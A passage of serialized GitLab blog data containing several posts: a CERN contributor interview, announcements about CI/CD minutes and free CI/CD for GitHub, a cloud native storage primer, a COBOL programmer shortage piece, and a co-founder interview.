.note}\n",[865,995,9],{"slug":1182,"featured":6,"template":689},"celebrating-one-million-bug-bounties-paid","content:en-us:blog:celebrating-one-million-bug-bounties-paid.yml","Celebrating One Million Bug Bounties Paid","en-us/blog/celebrating-one-million-bug-bounties-paid.yml","en-us/blog/celebrating-one-million-bug-bounties-paid",{"_path":1188,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1189,"content":1195,"config":1200,"_id":1202,"_type":14,"title":1203,"_source":16,"_file":1204,"_stem":1205,"_extension":19},"/en-us/blog/cern-contributor-post",{"title":1190,"description":1191,"ogTitle":1190,"ogDescription":1191,"noIndex":6,"ogImage":1192,"ogUrl":1193,"ogSiteName":673,"ogType":674,"canonicalUrls":1193,"schema":1194},"GitLab Code Contributor: Daniel Juarez","Daniel Juarez shares his experience contributing to GitLab from CERN.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749673096/Blog/Hero%20Images/contributors-cover.png","https://about.gitlab.com/blog/cern-contributor-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Daniel Juarez\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-06-19\",\n      }",{"title":1190,"description":1191,"authors":1196,"heroImage":1192,"date":1197,"body":1198,"category":10,"tags":1199},[704],"2019-06-19","\n\nFor this edition of the [GitLab contributor blog posts](/blog/tags.html#contributors), I'm excited to introduce [Daniel Juarez](https://gitlab.com/danieljg) from [CERN](https://home.cern/).\n\n### Can you tell us about you do at CERN and what Geneva is like?\n\nI started working at CERN in September 2017 as an associate for the Version Control Systems team. I came to CERN from the [University of Oviedo](http://www.uniovi.es/en) in Spain, as the university has an arrangement with CERN to give its students an opportunity to work here. One of my main responsibilities is to improve, maintain, and support the GitLab setup at CERN, as well as the continuous integration (CI) infrastructure.\n\n[Geneva](https://www.google.com/maps/place/Geneva,+Switzerland/@46.2050241,6.1089833,13z) feels like an extension of CERN, as you can meet people from all over the world with so many international organizations in the city. It may not be the best place in the winter if you are not into skiing, but the city has a wonderful lake and is full of life in the summer.\n\n![Daniel Juarez](https://about.gitlab.com/images/blogimages/Daniel_Juarez.jpeg){: .shadow.small.right.wrap-text}\n\n### How long have you used GitLab and why did you decide to make contributions?\n\nI first used GitLab when I joined CERN. Contributing to GitLab is part of my job, and [my first merge request (MR)](https://gitlab.com/gitlab-org/gitlab-runner/merge_requests/965) was on [the Runner project](https://gitlab.com/gitlab-org/gitlab-runner).\n\nIn addition to MRs, I create issues and work with the GitLab team to find solutions. A good example is the [storage performance issue](https://gitlab.com/gitlab-org/gitlab-ee/issues/11556) that we ran into recently.\n\n### Do you plan/coordinate contributions to GitLab at CERN or is contribution done on an individual basis? Any advice for GitLab customers who want to make contributions?\n\nWe keep track of our current GitLab issues and improvement areas in our internal Jira instance, and from there we organize who will submit an MR or open an issue with GitLab. We have a few other GitLab contributors at CERN, like [Alex Lossent](https://gitlab.com/alexcern) and [Borja Aparicio](https://gitlab.com/baparici).\n\nIn terms of advice for others, I encourage people to ping GitLab team members, such as product managers or maintainers, if you feel like your MRs or issues are not being picked up in a timely manner. You can find GitLab team members either on the [team page](/company/team/) or the [product categories page](/handbook/product/categories/). It's also helpful to note how many users are being impacted by your issue. Even though only one person from your organization may be commenting on an issue or MR, it could actually have an impact on thousands of people.\n\n### What has been your experience when contributing to GitLab?\n\nGitLab team members are always eager to help. They show interest in community issues and MRs, which is highly appreciated. Engagement from the GitLab team has helped us improve the service we provide to ~16,000 GitLab users at CERN.\n\nHowever, we are concerned about the large number of open issues at GitLab. Even if issues have the `customer` label, we are concerned that sometimes they could be forgotten.\n\n### Are there any community contributions (MRs) to GitLab that you thought were particularly interesting/useful?\n\nFrom CERN, we were definitely happy to have [SAML support](/releases/2015/06/22/gitlab-7-12-released/) a few years ago. We also found [Shared CI Runners for groups](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/9646) to be helpful, because some of our users were required to have the same runner registered against multiple projects instead of having it per group. This clearly improved the service for many of our users that rely on private runners and cannot use our shared infrastructure.\n\n### What do you like to do when you're not working?\n\nI love playing video games no matter the genre. Recently, I started watching bad movies and learning to cook new dishes (usually at the same time). I find that cooking helps me digest the bad movies!\n\n### Anything else you want to share with the community?\n\nDo not be afraid to submit MRs! It might look difficult in the beginning, but GitLab team members will do their best to help your changes \"go upstream\" to GitLab. I learned that wider community members are also willing to help.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1201,"featured":6,"template":689},"cern-contributor-post","content:en-us:blog:cern-contributor-post.yml","Cern Contributor Post","en-us/blog/cern-contributor-post.yml","en-us/blog/cern-contributor-post",{"_path":1207,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1208,"content":1214,"config":1220,"_id":1222,"_type":14,"title":1223,"_source":16,"_file":1224,"_stem":1225,"_extension":19},"/en-us/blog/ci-cd-github-extended-again",{"title":1209,"description":1210,"ogTitle":1209,"ogDescription":1210,"noIndex":6,"ogImage":1211,"ogUrl":1212,"ogSiteName":673,"ogType":674,"canonicalUrls":1212,"schema":1213},"We're extending free usage of CI/CD for GitHub for another six months!","Get another six months' use of CI/CD for GitHub on GitLab.com, free of charge.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666262/Blog/Hero%20Images/default-blog-image.png","https://about.gitlab.com/blog/ci-cd-github-extended-again","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"We're extending free usage of CI/CD for GitHub for another six months!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"William Chia\"}],\n        \"datePublished\": \"2019-09-09\",\n      }",{"title":1209,"description":1210,"authors":1215,"heroImage":1211,"date":1217,"body":1218,"category":299,"tags":1219},[1216],"William Chia","2019-09-09","\n\n[CI/CD for GitHub](/solutions/github/) allows you to host your code on GitHub while taking advantage of GitLab for CI/CD. In fact, [CI/CD for external repos](https://docs.gitlab.com/ee/ci/ci_cd_for_external_repos/) lets you use any Git repo as a host together with GitLab CI/CD.\n\nWhen we first released the ability to use GitLab CI/CD with other Git repositories we placed it into our [Premium tier](/pricing/premium/) for GitLab Self-Managed. Normally, features go into a corresponding pricing tier on GitLab.com but we believed this was a specific case where we should offer a feature for free on GitLab.com because of the amount of repos on GitHub.com. Not knowing how long we'd keep this pricing, we set a deadline of one year. When that time came, we extended for six months.\n\nToday, we are extending the deadline for using CI/CD for external repos, including CI/CD for GitHub again. Now you'll have until **Mar. 22, 2020** to use these capabilities with private repos (see below for open source) as a [Free or Bronze](/pricing/) user on GitLab.com. This feature will continue to be part of the [Premium tier](/pricing/premium/) for GitLab Self-Managed.\n\n## Always free for open source\n\nThis extension applies to private repos hosted on GitLab.com. As part of our commitment to open source, [public projects get all the features of Gold for free](/solutions/open-source/). GitLab CI/CD for GitHub works by automatically mirroring your repos to GitLab.com. As such, if you have a public project on GitHub, it will also be public on GitLab so you can always take advantage of GitLab CI/CD for public projects.\n\n## Why we're extending the offer\n\nFor a rationale on our extension see our previous blog post when we [first extended external CI/CD](/blog/six-more-months-ci-cd-github/). When it came to the current deadline we found that the reasoning still held true and [decided to extend again](https://gitlab.com/gitlab-org/gitlab-ee/issues/13065).\n\nAs always, we'd love your feedback in the comments below.\n",[109,685,267,9],{"slug":1221,"featured":6,"template":689},"ci-cd-github-extended-again","content:en-us:blog:ci-cd-github-extended-again.yml","Ci Cd Github Extended Again","en-us/blog/ci-cd-github-extended-again.yml","en-us/blog/ci-cd-github-extended-again",{"_path":1227,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1228,"content":1233,"config":1239,"_id":1241,"_type":14,"title":1242,"_source":16,"_file":1243,"_stem":1244,"_extension":19},"/en-us/blog/ci-minutes-for-free-users",{"title":1229,"description":1230,"ogTitle":1229,"ogDescription":1230,"noIndex":6,"ogImage":1211,"ogUrl":1231,"ogSiteName":673,"ogType":674,"canonicalUrls":1231,"schema":1232},"Changes to CI pipeline minutes for new free users","This change better aligns to GitLab's buyer-based open-core model.","https://about.gitlab.com/blog/ci-minutes-for-free-users","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Changes to CI pipeline minutes for new free users\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2020-03-18\",\n      }",{"title":1229,"description":1230,"authors":1234,"heroImage":1211,"date":1236,"body":1237,"category":930,"tags":1238},[1235],"Sid Sijbrandij","2020-03-18","___Update October 8, 2024: This blog is superseded by the blog post announcing [upcoming changes to CI/CD minutes for free tier users on GitLab.com](https://about.gitlab.com/blog/ci-minutes-update-free-users/). Please refer to our [pricing page](https://about.gitlab.com/pricing/) for the full breakdown of usage limits per tier.___\n\nEffective Sunday March 15, 2020, UTC, we are making changes to the CI pipeline minutes offered to *new* free users.\nMoving forward, all free accounts will have 2000 pipeline minutes per group per month independent of the visibility of the project.\nExisting free users will not have their plans changed.\n\n## What are pipeline minutes?\n\nAs we share on our [pricing page](https://about.gitlab.com/pricing/),\n\n> Pipeline minutes are the execution time for your pipelines on our shared runners. \n> Execution on your own runners will not increase your pipeline minutes count and is unlimited.\n\nPipeline minutes are a crucial part of what makes GitLab special.\n\n## Where did this come from?\n\nOne of our core values at GitLab is [efficiency](https://handbook.gitlab.com/handbook/values/#efficiency).\nAs GitLab grows and matures as both a company and a product, we've [really focused on becoming a more efficient company](https://youtu.be/wrnWaYS7Fgo?t=275). \nThis includes making sure we're being efficient in our CI offerings. \n\nAs we work on some new improvements to CI, including Windows and MacOS runners, we evaluated usage by free users.\nFrom an internal analysis, we found that 95% of free users who used CI minutes in January 2020 used fewer than 1000 CI minutes.\nBut we're not talking about 1000 minutes, we're talking about twice that. \nAnd 2000 minutes is a lot of minutes.\nThat's over an hour of CI minutes every day. \n\nWe are constantly working to provide the most value to our community through GitLab.\nThe best way we can do that is by strengthening our open source offering, including [make any features open source that are eligible to be open source](/company/pricing/#if-a-feature-can-be-moved-down-do-it-quickly).\n\n## What if that's not enough minutes?!\n\nIf 2000 minutes isn't enough, free users can buy [additional CI minutes](https://docs.gitlab.com/ee/subscriptions/#purchasing-additional-ci-minutes).\n\nAlternatively, you can bring your own runners. \nYou can [run specific runners for any of your projects](https://docs.gitlab.com/runner/). \nWe only count minutes on the shared runners we provide on GitLab.com.\n\n## What's next?\n\nExcited about all the cool things that can be done with CI?\nMe too!\n\nHere are some other things coming down the pipeline in the next couple of releases:\n\n* [Dynamic child pipeline creation via artifact includes](https://gitlab.com/gitlab-org/gitlab/-/issues/35632)\n* [Autoscaling GitLab CI jobs on AWS Fargate (MVC)](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2972)\n* [Notifications for when pipelines are fixed](https://gitlab.com/gitlab-org/gitlab/-/issues/24309)\n",[109,685,267,9],{"slug":1240,"featured":6,"template":689},"ci-minutes-for-free-users","content:en-us:blog:ci-minutes-for-free-users.yml","Ci Minutes For Free Users","en-us/blog/ci-minutes-for-free-users.yml","en-us/blog/ci-minutes-for-free-users",{"_path":1246,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1247,"content":1252,"config":1257,"_id":1259,"_type":14,"title":1260,"_source":16,"_file":1261,"_stem":1262,"_extension":19},"/en-us/blog/ci-minutes-update-free-users",{"title":1248,"description":1249,"ogTitle":1248,"ogDescription":1249,"noIndex":6,"ogImage":1211,"ogUrl":1250,"ogSiteName":673,"ogType":674,"canonicalUrls":1250,"schema":1251},"Upcoming changes to CI/CD minutes for free tier users on GitLab.com","The reduction of CI/CD minutes aligns with the majority of free user usage","https://about.gitlab.com/blog/ci-minutes-update-free-users","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Upcoming changes to CI/CD minutes for free tier users on GitLab.com\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2020-09-01\",\n      }",{"title":1248,"description":1249,"authors":1253,"heroImage":1211,"date":1254,"body":1255,"category":930,"tags":1256},[1235],"2020-09-01","\nAt GitLab, we’ve been actively working towards empowering our community to make DevOps a reality for teams of all sizes. We’ve constantly [moved features down](/blog/new-features-to-core/) to our free product to enable more users to benefit from it. The [lower tiers offer more relative value](/company/pricing/#lower-tiers-have-more-relative-value) and help to get more users access to a complete DevOps platform.\n\nAs a result, the usage of GitLab has grown significantly over time to an estimated [30 million registered users](/why-gitlab/) - of which almost 6 million GitLab.com users are on our GitLab.com free tier. While we are excited by this exponential growth, our underlying costs to support this growth have increased significantly. As GitLab matures as both a company and a product, we must focus on becoming a more efficient company.\n\nWe evaluted CI/CD minute usage and found that 98.5% of free users use 400 CI/CD minutes or less per month. By lowering the current monthly usage limit, we are not only aligning the CI/CD minute limits with usage and related tier prices, but ensuring we can continue to maintain our commitment to offer a free GitLab.com tier.\n\n## Changes to the GitLab.com Free tier\n\nEffective October 1, 2020, we are reducing CI/CD minutes to 400 minutes per top-level group (or personal namespace) per month on the Free tier of GitLab.com.\n\n|    | Free | Bronze | Silver | Gold |\n| -- | ---- | ------ | ------ | ---- |\n| Price | $0 | $4 | $19 | $99 |\n| CI/CD Minutes | 400 | 2,000 | 10,000 | 50,000 |\n\n## Check and reduce CI/CD minutes used\n\nCI/CD minute usage can be reduced in a number of ways, including [bringing your own runners](https://docs.gitlab.com/runner/).\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/GrO-8KtIpRA\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nFor more details on the changes and how to manage and reduce your CI/CD minutes usage, please visit the [customer FAQ](/pricing/faq-compute-credit/).\n\n## Options to increase CI/CD minutes available\n\nIf 400 minutes is not enough, you can purchase additional CI/CD minutes at $10 per 1000 minutes or upgrade to [a paid tier](/pricing/). Also, you can bring your own runners. You can [run specific runners for any of your projects](https://docs.gitlab.com/runner/). We only count minutes on the shared runners we provide on GitLab.com.\n\nGitLab also offers Gold tier capabilities and 50,000 minutes per group per month CI/CD minutes for our [Open Source](/solutions/open-source/join/), [Education](/solutions/education/), and [Startups](/solutions/startups/) programs. If you are eligible for these programs, consider applying through their relevant program pages.\n\n## CI/CD minute limits will remain unchanged for Open Source, Education and Startups programs\n\nCI/CD minute limits will **remain unchanged** for members of our GitLab for [Open Source](/solutions/open-source/join/), [GitLab for Education](/solutions/education/), and [GitLab for Startups](/solutions/startups/) programs and will continue to match our [Gold tier](/pricing/). For more information on these programs and how to apply, please visit the relevant program pages.\n\n## More information\n\nPlease refer to the [customer FAQ](/pricing/faq-compute-credit/) for more information.\n\nTo address your questions and feedback, we have created a space in the [GitLab Community Forum](https://forum.gitlab.com/t/ci-cd-minutes-for-free-tier/40241), which is actively monitored by GitLab Team members and Product Managers involved with this change.\n",[109,685,267,9],{"slug":1258,"featured":6,"template":689},"ci-minutes-update-free-users","content:en-us:blog:ci-minutes-update-free-users.yml","Ci Minutes Update Free Users","en-us/blog/ci-minutes-update-free-users.yml","en-us/blog/ci-minutes-update-free-users",{"_path":1264,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1265,"content":1271,"config":1277,"_id":1279,"_type":14,"title":1280,"_source":16,"_file":1281,"_stem":1282,"_extension":19},"/en-us/blog/cloud-native-storage-beginners",{"title":1266,"description":1267,"ogTitle":1266,"ogDescription":1267,"noIndex":6,"ogImage":1268,"ogUrl":1269,"ogSiteName":673,"ogType":674,"canonicalUrls":1269,"schema":1270},"A guide to cloud native storage for beginners","Choosing a cloud native development strategy is a smart step in DevOps, but storage can be a challenge. Here’s what you need to consider.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681560/Blog/Hero%20Images/cloudnative.jpg","https://about.gitlab.com/blog/cloud-native-storage-beginners","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A guide to cloud native storage for beginners\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2020-09-10\",\n      }",{"title":1266,"description":1267,"authors":1272,"heroImage":1268,"date":1274,"body":1275,"category":682,"tags":1276},[1273],"Valerie Silverthorne","2020-09-10","\n\n[DevOps](/topics/devops/) and cloud native go hand-in-hand but that doesn’t mean the journey is straightforward, particularly when it comes to storage. Here’s everything you need to know about cloud-native storage if you’re just getting started. \n\n## What is cloud-native software development?\n\nBoiled down, the term [cloud native](/topics/cloud-native/) simply means taking advantage of the power of the cloud and doing so from the beginning of the software development lifecycle. Flexibility, speed, and “always on” capabilities make the cloud an ideal place for [modern software development](https://www.infoworld.com/article/3281046/what-is-cloud-native-the-modern-way-to-develop-software.html).\n\nAlthough [containers aren’t limited to just the cloud](https://containerjournal.com/features/what-do-containers-have-to-do-with-being-cloud-native-anyway/), they are a key part of cloud native software development because they make it simple to move chunks of code from cloud to cloud using the same set of tools and processes. Containers can be created, moved or deleted with just the click of a mouse. [Kubernetes](/solutions/kubernetes/) is an increasingly popular open source tool for managing containers.\n\n## Why storage is the stumbling block\n\nSo far, so good, but what about storage? The features that make containers so ideal for cloud native (flexible, portable, disposable) are the same things that make them a storage nightmare. Developers finished with containers can just kill them – but for most apps to work, they need access to reliable storage that can’t be eliminated. \n\nAnd that’s the big hiccup when it comes to cloud native storage, says [Brendan O’Leary](/company/team/#brendan), senior developer evangelist at GitLab. “Almost every app in existence needs database storage,” Brendan explains. “But in a cloud native world things come and go but storage can’t do that. Storage has to stick around and solving for that is the hardest part of cloud native. That’s the thing we need to conquer next.”\n\nThe [Cloud Native Computing Foundation](https://www.cncf.io/) says the goal is to create [\"persistent information\"](https://www.cncf.io/blog/a-complete-storage-guide-for-your-kubernetes-storage-problems/) that exists no matter what’s going on around it. Ideally the CNCF recommends that information not be stored in what it calls \"volatile\" containers.\n\n## Solutions on the horizon\n\nThe good news is that a number of companies are trying to solve the tricky problem of cloud native storage. Here’s a quick look in no particular order (Cockroach and Rancher are GitLab partners):\n\n* [OpenEBS]( https://openebs.io) is a Kubernetes-based tool to create stateful applications using Container Attached Storage.\n* Also Kubernetes-based, [Rook](https://rook.io) offers self-managed, scaling, and healing storage services.\n* [Cockroach Labs](https://www.cockroachlabs.com/) uses Distributed SQL to make databases portable and scalable.\n* [Rancher Longhorn](https://longhorn.io) offers persistent storage for Kubernetes.\n\n## Final considerations\n\nA Gartner Group report, “Top Emerging Trends in Cloud-Native Infrastructure”, advises clients to “choose storage solutions aligned with container-native data service requirements and the standard storage interface, [Container Storage Interface (CSI)](https://www.architecting.it/blog/container-storage-interface/). CSI is an API that lets container orchestration platforms like Kubernetes seamlessly communicate with stored data via a plug-in. \n\nAnd finally, there’s no shame in choosing something straightforward, Brendan suggests, particularly if you’re just getting started in the Kubernetes world. “You can go with a cloud provider’s data storage options,” he says. “That’s still cloud native but it’s even simpler to just use the tools that exist. Don’t try to reinvent the wheel.”\n\nCover image by [Joshua Coleman](https://unsplash.com/@joshstyle) on [Unsplash](https://unsplash.com)\n{: .note}\n",[845,1038,9],{"slug":1278,"featured":6,"template":689},"cloud-native-storage-beginners","content:en-us:blog:cloud-native-storage-beginners.yml","Cloud Native Storage Beginners","en-us/blog/cloud-native-storage-beginners.yml","en-us/blog/cloud-native-storage-beginners",{"_path":1284,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1285,"content":1291,"config":1296,"_id":1298,"_type":14,"title":1299,"_source":16,"_file":1300,"_stem":1301,"_extension":19},"/en-us/blog/cobol-programmer-shortage",{"title":1286,"description":1287,"ogTitle":1286,"ogDescription":1287,"noIndex":6,"ogImage":1288,"ogUrl":1289,"ogSiteName":673,"ogType":674,"canonicalUrls":1289,"schema":1290},"How can we help solve the COBOL programmer shortage?","A shortage of COBOL programmers is causing delays in processing unemployment claims and small business loans. We’re hoping our community can help.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749667886/Blog/Hero%20Images/cobolshortage.jpg","https://about.gitlab.com/blog/cobol-programmer-shortage","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How can we help solve the COBOL programmer shortage?\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Valerie Silverthorne\"}],\n        \"datePublished\": \"2020-04-23\",\n      }",{"title":1286,"description":1287,"authors":1292,"heroImage":1288,"date":1293,"body":1294,"category":10,"tags":1295},[1273],"2020-04-23","\n\nIn our current world situation is it any surprise that a shortage of COBOL developers is holding up unemployment benefits and Small Business Association loan processing?\n\nActually, it is kind of surprising. We’ve grown used to the rapid advance of technology and it’s safe to say we’re like most companies – looking forward and not backward.\n\n## COBOL programmers needed\n\nBut it might be time to change that, and we’re reaching out to all of you for ideas and suggestions on ways to help provide a solution to the large number of COBOL programmers needed. What can we, as a community, do to help government agencies overwhelmed with demands on aging mainframes and with too few programmers to get the jobs done?\n\nCNN and a number of other news agencies reported that a lack of COBOL programming expertise has led to [long waits in processing unemployment benefits and small business loans](https://www.techspot.com/news/84796-us-states-desperate-cobol-programmers-ibm-offering-free.html?fbclid=IwAR1M2tlg2MeLHsG7ZzHawzPtsliTBaJX-1EgTlxIdr4BSHihN6sn-JbKpeo) at a time when [joblessness has hit record highs](https://www.washingtonpost.com/business/2020/04/16/unemployment-claims-coronavirus/).\n\n### Oppertunities for COBOL programmers\n\nBut COBOL isn’t limited to government entities: Large financial services and a myriad of other industries are still heavily reliant on mainframes and their primary programming language. As such,there is a large number of COBOL programmers needed with a wide array of oppertunities available. That’s not likely to change anytime soon – IBM says there are 240 billion lines of COBOL running today with an additional 5 billion being written every year.\n\nWhile that may sound like job security, COBOL programming isn’t widely taught today and it certainly lacks the developer interest level of Ruby or TypeScript or Go. A quick search on job site [Glassdoor](https://www.glassdoor.com/) shows about 1700 jobs advertised for COBOL programmers across the US today, while there are well over 4000 potential employers for Go or Ruby developers, and over 30,000 for Java developers.\n\nToday a number of companies [are working to integrate](https://www.rocketsoftware.com/zos-open-source/tools) more \"modern\" software development methodologies with mainframes ([even GitLab](https://gitlab.com/gitlab-org/gitlab-runner/issues/3263)), but that’s not going to solve the short-term need (or probably even the medium-term need).\n\n### Education and Upskilling for COBOL programmers\n\nThere are some educational opportunities available from [Udemy](https://www.udemy.com/course/mainframe-the-complete-cobol-course-from-beginner-to-expert/), [LinkedIn](https://www.linkedin.com/learning/topics/cobol), [Learning Tree](https://www.learningtree.com/courses/2301/enterprise-cobol-programming-part-1/) and a [free COBOL programming course](https://github.com/openmainframeproject/cobol-programming-course) from the openmainframeproject on GitHub.\n\nCan we do more? We don’t have the answers but we’ve opened [a public issue](https://gitlab.com/gitlab-com/www-gitlab-com/-/issues/7271) so please leave any ideas there.\n\n_Updated on June 1, 2020: We've had some responses on our public issue including this from contributor [Timothy Austin](https://gitlab.com/taustin288): \"The companies who hold all these large COBOL code bases need to pressure the universities to require all up and coming Java programmers to have a rudimentary knowledge of COBOL. This would allow them the flexibility to convert the COBOL or continue use it as is if they so desire.\" Learn more in [our issue](https://gitlab.com/gitlab-com/www-gitlab-com/-/issues/7271)._ \n\nCover image by [Joshua Sortino](https://unsplash.com/@sortino) on [Unsplash](https://www.unsplash.com)\n{: .note}\n",[267,708,9],{"slug":1297,"featured":6,"template":689},"cobol-programmer-shortage","content:en-us:blog:cobol-programmer-shortage.yml","Cobol Programmer Shortage","en-us/blog/cobol-programmer-shortage.yml","en-us/blog/cobol-programmer-shortage",{"_path":1303,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1304,"content":1310,"config":1316,"_id":1318,"_type":14,"title":1319,"_source":16,"_file":1320,"_stem":1321,"_extension":19},"/en-us/blog/cofounder-relations",{"title":1305,"description":1306,"ogTitle":1305,"ogDescription":1306,"noIndex":6,"ogImage":1307,"ogUrl":1308,"ogSiteName":673,"ogType":674,"canonicalUrls":1308,"schema":1309},"Co-founders: Key conversations build lasting relationships","Our CEO sits down with leadership psychologist Banu Hantal to discuss his relationship with GitLab co-founder Dmitriy Zaporozhets.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680642/Blog/Hero%20Images/cofounders_phone.jpg","https://about.gitlab.com/blog/cofounder-relations","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The secret to an enduring co-founder relationship? Have those crucial conversations\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sara Kassabian\"}],\n        \"datePublished\": \"2019-06-21\",\n      }",{"title":1311,"description":1306,"authors":1312,"heroImage":1307,"date":1313,"body":1314,"category":299,"tags":1315},"The secret to an enduring co-founder relationship? Have those crucial conversations",[927],"2019-06-21","\n\nIn the latest installment of our [Pick Your Brain](/blog/tags.html#pick-your-brain) series, leadership psychologist [Banu Hantal](https://www.banuhantal.com/) interviews our CEO [Sid Sijbrandij](/company/team/#sytses) about his relationship with co-founder and engineering fellow [Dmitriy Zaporozhets](/company/team/#dzaporozhets). In their discussion, Sid shares GitLab’s origin story and talks about how transparent communication with Dmitriy helps keep their partnership strong.\n\n## The beginning of GitLab\n\nDmitriy and Sid’s partnership started in the same place as most modern-day relationships: online. Dmitriy started GitLab while he was working elsewhere, and within a year of GitLab’s launch, 300 people had contributed code.\n\nSid saw that GitLab had potential as a service and started GitLab.com independently of Dmitriy. Sid didn’t need Dmitriy’s permission to do this, because [GitLab was (and partially remains) open source](/blog/gitlab-is-open-core-github-is-closed-source/), but reached out to Dmitriy to let him know about the next iteration of the project. Dmitriy was gracious and celebrated the fact that Sid was expanding the impact of GitLab.\n\nFor about a year, Sid invested in building GitLab.com while also working as a consultant until Dmitriy posted a tweet saying, “I want to work on GitLab full time.” That tweet changed GitLab’s story.\n\n“It was quite unusual to post that to the entire world. He was employed and everything,” says Sid. “I emailed Dmitriy and I said ‘Hey, I saw your tweet, how much do you want to earn to start working on GitLab?’”\n\nBy this time, there were a few big companies that were using GitLab.com and they were asking Sid to add new features to the product. Once Dmitriy came on board, it was possible to build those features quicker.\n\n“I went to the local Western Union money office, and when I said I wanted to wire money from the Netherlands to the Ukraine, they were like, ‘Do you know this person or is this someone you met over the internet?’”\n\n“You didn’t even know what Dmitriy looked like?!” exclaims Banu.\n\n“At that point my mental image of Dmitriy was like a pink mob boss because that was his avatar,” says Sid, but that didn’t last for long. They finally met in person in Krakow shortly after making plans to commit their efforts to GitLab full time.\n\n## Communication makes for happy co-founders\n\n\"Do you think having a mostly remote relationship is an advantage or disadvantage?\" asks Banu.\n\n\"I don't think it matters that much,\" says Sid. \"I think you do the same things, and you've got to make sure there's regular communication. To this day we have a call every single week. When there’s something important he gets a heads up so he doesn’t feel misinformed.\"\n\nIf there is an issue that is clearly contentious, Sid says, they put all the information on the table and discuss the problem directly.\n\n“I think surprises are really bad. You want to make sure if there’s something important that you get a heads up, and that there is a regular cadence of communication.”\n\nThough Dmitriy and Sid rarely get the chance to interact in person today, there is very little conflict in their relationship.\n\n## What to do when one co-founder is the CEO\n\n“What you don’t want is the [Peter Principle](https://en.wikipedia.org/wiki/Peter_principle), where the only way for an engineer to advance is to become a manager,” says Sid. “And then, oftentimes, you lose a great engineer and get a bad manager.”\n\nSo, they elected to structure GitLab the company so there are more leadership opportunities for engineers by offering a dual-career track. While Sid is co-founder and CEO of the company, Dmitriy is a co-founder and engineering fellow. A fellowship offers a path to advancement for engineers that does not involve people management.\n\nThough GitLab was first built as an alternative to GitHub, it has since expanded its technical capabilities ten-fold, explains Sid. In fact, it was Dmitriy that first built the [CI solution](/solutions/continuous-integration/) and continuous testing framework which is a core component to our product today.\n\n“I was like, he can do whatever he wants – he’s a co-founder and so far his hunches pay off. At a certain point someone contributed to that and then they joined the company and said, 'Let’s integrate the two products.' First Dmitriy told him he was wrong, and then together they came to me and I told them they were wrong, and we ended up doing it and it was the best thing that ever happened to GitLab.”\n\n“How would you describe your relationship with Dmitriy?” asks Banu.\n\nThere are three dimensions to the partnership between Sid and Dmitriy. They are co-founders, there is a hierarchical relationship with Sid as CEO, and of course, a friendship.\n\n“I think it’s frequently better to fall in love with each other’s work and then build a relationship based on that, rather than fall in love with the person and then try to build a business,” says Sid. “Friendships based on business tend to last longer than businesses based on friendships.”\n\nWatch the full conversation between Sid and Banu here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/gpQKtSKMzkI?start=6\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nPhoto by [Pavan Trikutam](https://unsplash.com/@ptrikutam) on [Unsplash](https://unsplash.com/photos/71CjSSB83Wo)\n{: .note}\n",[803,9,779],{"slug":1317,"featured":6,"template":689},"cofounder-relations","content:en-us:blog:cofounder-relations.yml","Cofounder Relations","en-us/blog/cofounder-relations.yml","en-us/blog/cofounder-relations",{"_path":1323,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1324,"content":1330,"config":1337,"_id":1339,"_type":14,"title":1340,"_source":16,"_file":1341,"_stem":1342,"_extension":19},"/en-us/blog/collaborative-course-environment-gitlab-grav",{"title":1325,"description":1326,"ogTitle":1325,"ogDescription":1326,"noIndex":6,"ogImage":1327,"ogUrl":1328,"ogSiteName":673,"ogType":674,"canonicalUrls":1328,"schema":1329},"Creating open course environments with GitLab and Grav CMS","Guest author Paul Hibbitts shares how he combines GitLab with the flat-file CMS Grav 